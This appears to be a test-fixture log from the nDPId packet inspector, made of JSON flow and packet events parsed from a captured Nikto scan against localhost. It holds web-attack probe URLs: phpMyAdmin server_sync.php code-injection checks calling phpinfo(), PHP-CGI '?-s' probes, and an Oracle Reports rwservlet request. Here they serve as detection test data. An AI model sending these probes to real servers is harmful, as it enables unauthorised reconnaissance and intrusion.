+00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_packet_id":1,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277908,"pkt":"AAAAAAAAAAAAAAAACABFAAEIG05AAEAGIKB\/AAABfwAAAcd+H5BZWCIKm5\/s0oAYAED+\/AAAAQEICp1m\/7ydZv+8R0VUIC9yZXBvcnRzL3J3c2VydmxldD9zZXJ2ZXI9cmVwc2VydityZXBvcnQ9L3RtcC9oYWNrZXIucmRmK2Rlc3R5cGU9Y2FjaGUrZGVzZm9ybWF0PVBERiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzQzNykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01132{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":754,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":754,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277908,"flow_last_seen":1576420277908,"flow_idle_time":7560000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51070,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/reports\/rwservlet?server=repserv+report=\/tmp\/hacker.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003437)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_packet_id":1,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277909,"pkt":"AAAAAAAAAAAAAAAACABFAAC9phtAAEAGlh1\/AAABfwAAAceAH5B1J59d+HsAr4AYAED+sQAAAQEICp1m\/72dZv+9R0VUIC9vcGVuLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ4KQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":755,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":755,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277909,"flow_last_seen":1576420277909,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277909,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51072,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/open.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006448)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_packet_id":1,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277910,"pkt":"AAAAAAAAAAAAAAAACABFAADA+2VAAEAGQNB\/AAABfwAAAceCH5AHKcInz6YgT4AYAED+tAAAAQEICp1m\/76dZv++R0VUIC9meDI5aWQxLnR4dCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA2NDQ5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":756,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277910,"flow_last_seen":1576420277910,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51074,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id1.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006449)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_packet_id":1,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277912,"pkt":"AAAAAAAAAAAAAAAACABFAADAC6pAAEAGMIx\/AAABfwAAAceEH5BX8jLvG2MI1oAYAED+tAAAAQEICp1m\/8CdZv\/AR0VUIC9meDI5aWQyLnR4dCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjQ1MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":757,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":757,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277912,"flow_last_seen":1576420277912,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51076,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/fx29id2.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006450)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_packet_id":1,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420277913,"pkt":"AAAAAAAAAAAAAAAACABFAAC4Ym1AAEAG2dB\/AAABfwAAAceGH5BoAlsuZzuA64AYAED+rAAAAQEICp1m\/8GdZv\/BR0VUIC8\/LXMgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY1MjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":758,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277913,"flow_last_seen":1576420277913,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420277913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51078,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006523)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_packet_id":1,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277917,"pkt":"AAAAAAAAAAAAAAAACABFAADBkMVAAEAGq29\/AAABfwAAAceIH5D4rqmFil0FBYAYAED+tQAAAQEICp1m\/8WdZv\/ER0VUIC9sb2dpbi5waHA\/LXMgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjUyNCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":759,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":759,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277917,"flow_last_seen":1576420277917,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277917,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51080,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.php?-s","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006524)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00716{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_packet_id":1,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277919,"pkt":"AAAAAAAAAAAAAAAACABFAADk1ppAAEAGZXd\/AAABfwAAAceKH5AeVe\/gFGxiPoAYAED+2AAAAQEICp1m\/8adZv\/GR0VUIC8zcmRwYXJ0eS9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":760,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":760,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277919,"flow_last_seen":1576420277919,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277919,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51082,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_packet_id":1,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277920,"pkt":"AAAAAAAAAAAAAAAACABFAADbRbxAAEAG9l5\/AAABfwAAAceMH5CzBHzzJnp1p4AYAED+zwAAAQEICp1m\/8idZv\/IR0VUIC9waHBNeUFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":761,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":761,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277920,"flow_last_seen":1576420277920,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277920,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51084,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpMyAdmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_packet_id":1,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":242,"pkt_l4_len":208,"thread_ts_msec":1576420277922,"pkt":"AAAAAAAAAAAAAAAACABFAADkm4xAAEAGoIV\/AAABfwAAAceOH5AOOaLD4MTa7oAYAED+2AAAAQEICp1m\/8qdZv\/KR0VUIC8zcmRwYXJ0eS9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01095{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":762,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":762,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277922,"flow_last_seen":1576420277922,"flow_idle_time":7560000,"flow_min_l4_payload_len":176,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1576420277922,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51086,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/3rdparty\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_packet_id":1,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420277923,"pkt":"AAAAAAAAAAAAAAAACABFAADb3d5AAEAGXjx\/AAABfwAAAceQH5AJweSWVSMF84AYAED+zwAAAQEICp1m\/8udZv\/LR0VUIC9waHBteWFkbWluL3NlcnZlcl9zeW5jLnBocD9jPXBocGluZm8oKSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNjYwOCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":763,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277923,"flow_last_seen":1576420277923,"flow_idle_time":7560000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420277923,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51088,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpmyadmin\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00695{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_packet_id":1,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":1576420277925,"pkt":"AAAAAAAAAAAAAAAACABFAADU+B5AAEAGRAN\/AAABfwAAAceSH5DHT8FWYmCfAYAYAED+yAAAAQEICp1m\/82dZv\/NR0VUIC9wbWEvc2VydmVyX3N5bmMucGhwP2M9cGhwaW5mbygpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDY2MDgpDQoNCg=="} +01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":764,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":764,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277925,"flow_last_seen":1576420277925,"flow_idle_time":7560000,"flow_min_l4_payload_len":160,"flow_max_l4_payload_len":160,"flow_tot_l4_payload_len":160,"flow_avg_l4_payload_len":160,"midstream":1,"thread_ts_msec":1576420277925,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51090,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/pma\/server_sync.php?c=phpinfo()","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:006608)"}} 